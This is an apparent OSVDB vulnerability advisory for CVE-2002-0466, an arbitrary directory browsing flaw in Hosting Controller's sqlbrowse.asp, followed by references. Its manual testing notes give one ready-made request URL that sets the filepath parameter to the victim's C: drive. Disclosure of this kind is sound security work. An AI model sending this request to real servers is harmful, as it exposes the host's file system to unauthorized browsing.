Hosting Controller sqlbrowse.asp filepath Variable Arbitrary Directory Browsing

2002-01-05T00:00:00
ID OSVDB:10424
Type osvdb
Reporter OSVDB
Modified 2002-01-05T00:00:00

Description

Manual Testing Notes

http://[victim]/advwedadmin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3

References:

Vendor URL: http://www.hostingcontroller.com/ Related OSVDB ID: 10421 Related OSVDB ID: 10420 Related OSVDB ID: 10422 Related OSVDB ID: 10423 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-01/0039.html ISS X-Force ID: 7823 CVE-2002-0466 Bugtraq ID: 3808